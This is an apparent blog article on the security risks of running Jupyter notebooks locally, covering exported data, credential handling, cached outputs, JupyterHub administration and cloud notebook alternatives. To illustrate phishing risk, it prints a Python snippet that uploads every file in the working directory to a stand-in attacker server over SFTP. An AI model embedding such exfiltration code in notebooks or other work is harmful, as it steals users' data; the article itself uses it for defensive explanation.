
Working Securely with Jupyter

by Andy Tate, October 11th, 2023

Too Long; Didn't Read

Jupyter, the second most downloaded VS Code marketplace tool, is popular but poses security risks, especially when used locally. Storing data in CSV files on personal machines can breach data security standards like GDPR and expose data to attacks. JupyterHub offers a more secure alternative, but proper administration is essential. Using cloud-based alternatives like Deepnote, Google Colab, Hex, Amazon SageMaker, or Paperspace can enhance security by eliminating local data storage issues and providing better control over permissions and environments.

Did you know the second most downloaded tool on the VS Code marketplace is Jupyter? Over 40 million downloads as of last year. It can run locally on anyone’s machine, or in the cloud through apps like JupyterHub. Jupyter is a great iterative coding environment, but it was built as an open-source academic tool, and there are a few security risks to mitigate before using it on sensitive company data.

Local Jupyter, Global Risk

Running Jupyter locally is the standard way of getting started. If you are a small team, you’re not going to want to deal with the headache of Docker and hosting, so everyone does pip install notebook or pip install jupyterlab.


Now you need data!

CSV risks

Many data analysts download their datasets by exporting huge CSVs containing every data point so they can just use csv.reader() or pandas.read_csv(). This makes analysis easier to access and keeps the data consistent.
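A minimal sketch of that workflow (the file name is hypothetical):

import pandas as pd

# Load the whole exported dataset from a local file
# ('transactions.csv' is a hypothetical export)
df = pd.read_csv('transactions.csv')
print(df.head())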


Legal issues

Most companies where a notebook is useful adhere to standards like GDPR, CCPA, HIPAA, and PCI DSS, all of which have specific rules for data storage and handling, and those rules probably don’t have a subsection dedicated to storage and handling on ‘Dave’s MacBook.’


So if you have a CSV or some other exported data on your local machine, are you even allowed to have it?


Is this guy analyzing transaction volume in an unencrypted, PCI DSS-protected dataset in a coffee shop, on open WiFi, where his laptop could be stolen? Big no-no.


Attacks

Data stored locally is typically not encrypted. Personal computers do now come with encryption capabilities (BitLocker on Windows, FileVault on Mac), but these aren’t always turned on by default, and if they weren’t enabled from the start, they’re rarely switched on as an afterthought.


If a local computer lacks such encryption measures, it leaves the stored data vulnerable to a variety of threats: malware, ransomware, theft, and phishing.


That last one, phishing, is an interesting security quirk with Jupyter notebooks. If you’re collaborating with a colleague on a notebook, it’s not uncommon to just email the .ipynb files back and forth (you could, of course, use version control instead). So if you received an email, ostensibly from your coworker, saying ‘check out this cool visualization I added!’, you probably wouldn’t think twice about opening the notebook and running it.


But the notebook could easily include the code below (maybe obfuscated across different cells and hidden in other code):


import os
import paramiko

# Attacker-controlled server and credentials, hardcoded in the malicious notebook
hostname = 'attacker.example.com'
username = 'attacker'
password = 'hunter2'

# Open an SSH connection, blindly trusting whatever host key is presented
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(hostname=hostname, username=username, password=password)

# Upload every file in the notebook's working directory to the remote server
sftp = ssh_client.open_sftp()
remote_directory_path = '/path/to/remote/directory'
for filename in os.listdir('.'):
    local_filepath = os.path.join('.', filename)
    if os.path.isfile(local_filepath):
        remote_filepath = os.path.join(remote_directory_path, filename)
        sftp.put(local_filepath, remote_filepath)


Congrats, you’ve just uploaded all your data to a random server. Is this going to happen? Unlikely, but possible. The wider point is that with sensitive data on your local computer, you immediately open yourself up to all types of attacks. Jupyter notebooks will run any code. Though they do have some safeguards, the general idea is that you are the master of your domain: if you hit ‘Run all’, run all is what you get. Buyer (or rather, analyst) beware.


Leaks

Data can also be unintentionally leaked from a machine by the user. Firstly, through the cloud. Just as a lot of OSes don’t have encryption turned on by default, they do have cloud syncing turned on. It might not be obvious to a user that everything in their Documents or Downloads folder is also being uploaded to cloud storage (which, again, might not have the requisite compliance guarantees). Or, many moons ago, you synced your Code folder to Dropbox or GDrive as ersatz version control, and now it holds all the company’s data.


But you can also leak data to your colleagues. If you are sharing notebook files, you’ll also have to share the data. Suddenly, your data isn’t just on your local computer. It’s sitting in your email, and your colleagues’ email. It’s sitting on your shared GDrive, or in GitHub. What was one copy you downloaded to make analysis a little easier is now a dozen copies, in various states of unprotection, dotted around the web.


To mitigate the risks of using CSV files with Jupyter notebooks, you should follow the standard corporate IT security training suggestions, or connect directly to the database instead.


Database risks

Most analysts at a company will use database connectors such as snowflake-connector-python, psycopg2, or sqlalchemy to access their data. Accessing data this way means you don’t have to worry about the security of a local copy of the data, or its vulnerability if the machine is compromised or stolen. And since you aren’t passing data files around, you don’t have to worry about stray copies.
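A minimal sketch of that pattern with sqlalchemy and pandas, assuming a hypothetical Postgres warehouse (the connection string and table are placeholders):

import pandas as pd
from sqlalchemy import create_engine

# Connect straight to the database instead of exporting a CSV
# (the connection string is a placeholder; don't hardcode credentials,
# see 'Storing credentials' below)
engine = create_engine(
    'postgresql+psycopg2://analyst:secret@db.internal.example.com/analytics'
)

# Only the query result lives in memory; no file lands on disk
df = pd.read_sql('SELECT * FROM transactions LIMIT 1000', engine)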


But you do have to worry about two things:


Storing credentials

Now the data isn’t the problem; access to the data is. You have to store your credentials correctly, and correctly means not hardcoded into your Jupyter notebook, which you are emailing to people. Hardcoding is a glaring security risk: it gives anyone who has access to your notebook the keys to your data, including potentially sensitive or proprietary information.

Instead, you should use a secure method for managing your credentials. A simple and secure practice is to use environment variables. This involves storing your credentials in your system's environment and retrieving them in your notebook via the os.getenv() function in Python. This way, you're not explicitly exposing your credentials in your code.


Here's a basic example:

import os

# Obtain credentials from environment variables
username = os.getenv('DB_USERNAME')
password = os.getenv('DB_PASSWORD')


For an even higher level of security, consider using a dedicated secrets management service. These services, like AWS Secrets Manager or HashiCorp Vault, securely store your sensitive data and provide programmatic access when needed, often through an API.
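A minimal sketch of that pattern with AWS Secrets Manager and boto3 (the secret name and region are hypothetical):

import json
import boto3

# Fetch credentials at runtime instead of storing them on the machine
# ('prod/db-credentials' and the region are hypothetical)
client = boto3.client('secretsmanager', region_name='us-east-1')
response = client.get_secret_value(SecretId='prod/db-credentials')
secret = json.loads(response['SecretString'])

username = secret['username']
password = secret['password']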

Cached data

Jupyter caches data in a number of ways, which could pose a security risk if not handled correctly.


The main form of caching in Jupyter notebooks comes in the form of output cells. When you run a cell in a Jupyter notebook, the results are displayed under the cell and stored in the notebook file itself. This can include dataframes, graphs, images, or any other output. If your notebook contains sensitive data in the output cells, and the notebook file is shared or stored insecurely, it can lead to exposure of that data.


For example, if you're querying sensitive data from a database and then displaying that data directly in a Jupyter notebook, the data will be stored in the notebook file itself. This means you are open to all of the same security problems as with local data: if an attacker can access your notebook, they can access the data, and if you share the notebook, you are also sharing the saved data.
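You can see this for yourself: a .ipynb file is just JSON, and every saved output is serialized inside it. A quick sketch of inspecting one (the notebook name is hypothetical):

import json

# A .ipynb file is plain JSON; saved outputs sit right in the file
with open('analysis.ipynb') as f:
    notebook = json.load(f)

for cell in notebook['cells']:
    if cell['cell_type'] == 'code':
        print(cell.get('outputs', []))  # sensitive query results show up here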


Mitigating Local Jupyter Risks

In terms of mitigating these security risks, it's a good practice to:


  1. Clear the output cells containing sensitive data before sharing or storing your notebooks. This can be done from the menu (Cell -> All Output -> Clear) or programmatically, as shown in the sketch after this list.
  2. Regularly clear or secure your command history database.
  3. Be mindful of how and where you're sharing or storing your Jupyter notebooks.
  4. Consider using data masking or anonymizing techniques when working with sensitive data.
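For step 1, here's a minimal sketch of clearing outputs programmatically with nbformat (the notebook name is hypothetical); the same thing can be done from the command line with jupyter nbconvert --clear-output --inplace:

import nbformat

# Strip all saved outputs before sharing ('analysis.ipynb' is hypothetical)
nb = nbformat.read('analysis.ipynb', as_version=4)
for cell in nb.cells:
    if cell.cell_type == 'code':
        cell.outputs = []
        cell.execution_count = None
nbformat.write(nb, 'analysis.ipynb')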


Remember, while these steps can significantly reduce the risk, no system can be completely secure.


Finally, NVIDIA released a Jupyter security extension, Jupysec, as the culmination of their own research into the problems with Jupyter security. It scans your Jupyter environment for possible security issues and will highlight them for you in the notebook.



[Image: Jupysec report]


This type of proactive security should become a feature of your data pipeline if you are working with Jupyter in any capacity.


But instead of having to actively manage the risk on your local machine, you could mitigate these risks by moving Jupyter into the cloud.


There is a non-local way to run Jupyter notebooks: JupyterHub

JupyterHub is a multi-user server that manages and provides Jupyter notebooks to a group of users. It is a centralized system that can serve Jupyter Notebook instances to multiple users, allowing them to work on interactive data science projects in their own personal workspace but on the same server.


JupyterHub is particularly useful in an environment where you need to distribute computational resources and environments among several users, such as in large collaborative projects on a data team at a company. With JupyterHub, you can spawn, manage, and proxy multiple instances of the single-user Jupyter Notebook server.


JupyterHub also includes:

  • Authentication: JupyterHub has a pluggable authentication mechanism. It can be configured to use various authentication protocols, enabling integration with a broad range of identity providers like OAuth, LDAP, etc.


  • Containerization: JupyterHub is often used with Docker to provide each user with their own isolated environment. Other container or virtual environment technologies like Kubernetes can also be used.


  • Role-Based Access Control (RBAC): JupyterHub supports Role-Based Access Control, providing a fine-grained control system for defining user roles and assigning specific permissions to those roles.


RBAC, in particular, is an important feature that enables administrators to control who has access to what within JupyterHub. For instance, some users can be assigned the role of an 'admin' to manage the service, while others could be 'users' with access to their individual notebooks only. This capability helps enhance the security of JupyterHub and prevents unauthorized access to sensitive resources. It's particularly useful in large, collaborative environments where different levels of permissions and access rights need to be assigned.
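As a sketch, the pieces above come together in jupyterhub_config.py along these lines (assuming JupyterHub 2.x with the oauthenticator and dockerspawner packages installed; the role name, scopes, and user are illustrative):

# jupyterhub_config.py: illustrative settings, not a complete config

# Pluggable authentication: delegate login to GitHub OAuth
c.JupyterHub.authenticator_class = 'oauthenticator.github.GitHubOAuthenticator'

# Containerization: give each user an isolated Docker container
c.JupyterHub.spawner_class = 'dockerspawner.DockerSpawner'

# RBAC: a limited role that can only list users and read their activity
c.JupyterHub.load_roles = [
    {
        'name': 'auditor',
        'description': 'Read-only visibility into user activity',
        'scopes': ['list:users', 'read:users:activity'],
        'users': ['dave'],
    },
]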


BUT, there’s a problem word in all of the above: ‘administrators.’


Moving to JupyterHub is more secure if you administer the instance properly. However, effective administration of a JupyterHub instance is not a trivial task and requires a solid understanding of security principles, the JupyterHub system itself, and its associated technologies. A poorly administered JupyterHub instance can be just as risky, if not more, than individual Jupyter notebooks with lax security practices.


Setting up the server, managing user permissions, ensuring that the system is regularly updated to patch any security vulnerabilities, monitoring for any suspicious activity, and responding to potential security incidents are all responsibilities that fall on the administrators. Ineffectively performing these duties could lead to a variety of risks, from data leakage to unauthorized access, to potential misuse of computational resources.


Furthermore, the "human factor" also plays a significant role. Even the most secure systems can be compromised by human error. Administrators, like all users, make mistakes: they can accidentally grant excessive permissions to a user, overlook important security updates, or misconfigure security settings. That's especially true if those ‘administrators’ are actually just data leads. Effectively, moving to JupyterHub means the data lead on the team becomes more like DevOps, supporting the admin side of deploying the instance rather than working on the data.


Secure Cloud Notebooks

You can run Jupyter notebooks securely–it just takes a lot of effort. If you are a large team, you probably need someone dedicated to this, and you’ll need a codified process that’s incorporated into your training so everyone knows how to use Jupyter securely.

But there are alternatives–cloud notebooks.


| Setup | Risk | Mitigation |
| --- | --- | --- |
| Jupyter with CSV data | Data is stored or replicated in a non-secure place | Connect directly to a database |
| Jupyter with database data | Credentials may be stored in a non-secure place, or sensitive data may be cached and accessed | Use Jupyter in the cloud |
| Cloud Jupyter | Permissions and environments are not set up properly, so people have improper access and try to move data into other environments | Use cloud notebooks |

By leveraging cloud notebooks, teams can focus more on deriving insights from their data and less on navigating the complexities of securing Jupyter notebooks.


Some options for analysts are:

Deepnote

Deepnote is a unique cloud notebook designed to offer a seamless and interactive experience for data scientists and engineers working in Python. This platform offers real-time collaboration, enabling multiple users to work on the same notebook concurrently. One of its strengths is the intuitive and user-friendly interface, which makes it easier for users to develop, run, and share their code. Deepnote integrates effortlessly with various data sources and tools, promoting accessibility and versatility.


For security, Deepnote offers encrypted connections, ensuring data sent and received is protected from unwanted eyes. It also provides a robust permission system, allowing team leaders to dictate who can view or edit specific projects.


Its smart features, like variable explorer and auto visualizations, help elevate overall productivity, making it a go-to choice for professionals in the field of data science.

Google Colab

Google Colab is a widely recognized and utilized cloud notebook service provided by Google. It enables users to write and execute Python code in a web browser with zero configuration, free GPU access, and easy sharing. Colab is well-regarded for its ease of use, accessibility, and integration with Google Drive and other Google services.


It's deeply integrated with Google Drive, allowing easy sharing and collaboration within familiar Google environments. Security is bolstered by Google's robust infrastructure, which encrypts data both in transit and at rest. Given that it's a Google product, users benefit from the same security measures applied across Google services. For teams operating in a Google-based ecosystem, Google Colab presents an accessible and secure environment for notebook execution, especially when budget constraints are in play.


It supports various machine learning libraries and frameworks, making it an ideal environment for machine learning and data analysis projects. The provision of free resources and the user-friendly interface have contributed to its immense popularity among educators, researchers, and developers.


Hex

Hex offers a centralized platform where you can conduct your data analysis, visualize the results, and even create interactive data apps–all while maintaining high levels of security. This eliminates the risk of unencrypted data exposure and unauthorized access that may occur when notebooks are distributed across local machines.


Hex ensures that all data sent and received are encrypted, mitigating the risk of data interception. And perhaps one of the most appealing security features of Hex is its ephemeral nature. After a user session ends, no residual data is left on the servers, minimizing the risks associated with data at rest. Hex also simplifies the access control process. Instead of each analyst managing their own set of credentials to connect to databases or APIs, Hex provides an interface where your team can centrally control and monitor who has access to what data.


Lastly, Hex is HIPAA and SOC2-compliant, meaning it adheres to some of the strictest standards when it comes to protecting sensitive and personal information. This makes it an attractive option, especially for businesses operating in industries like healthcare or finance where data security is paramount.


Amazon SageMaker

Amazon SageMaker is a fully managed service that provides developers and data scientists the ability to build, train, and deploy machine learning models quickly. It is highly scalable and flexible, allowing users to create Jupyter notebooks for easy data exploration and analysis. SageMaker stands out due to its wide array of features, including built-in algorithms, model tuning, and high-performance runtime for inference.


Security is at its core, given that it's a part of the AWS suite. All data is encrypted in transit and at rest in the SageMaker environment. With fine-grained access controls, businesses can stipulate who can access specific datasets, notebooks, or model artifacts. Its integration with AWS Key Management Service (KMS) also means that users can create and control their encryption keys. Furthermore, SageMaker supports compliance standards such as HIPAA, making it a go-to for industries that demand high levels of data protection.


SageMaker is particularly beneficial for enterprises and professionals looking to deploy robust and efficient machine-learning solutions.


Paperspace

Paperspace is a high-performance cloud computing platform that focuses on developing machine learning, data science, and other compute-intensive projects. It offers Gradient, a cloud notebook platform aimed at enabling collaboration and development in machine learning and deep learning. Paperspace provides powerful GPU-backed machines, making it suitable for training complex models.


Safety and security are given top priority, with all data transmissions secured via SSL/TLS encryption. Their cloud infrastructure ensures that data at rest is also encrypted, guarding against potential breaches. With its team-focused features, Paperspace allows admins to easily manage access controls, ensuring only authorized personnel have access to critical datasets or models. Furthermore, its snapshot feature means that your work can be easily backed up, adding another layer of data security.


The platform is appreciated for its versatility, allowing users to run different types of environments and supporting various machine learning frameworks. Its scalable infrastructure and advanced features make it an attractive option for professionals working on demanding computational tasks.


Whichever you choose, it's essential that all users remain aware of security best practices, as technology can only mitigate, not eliminate, security risks.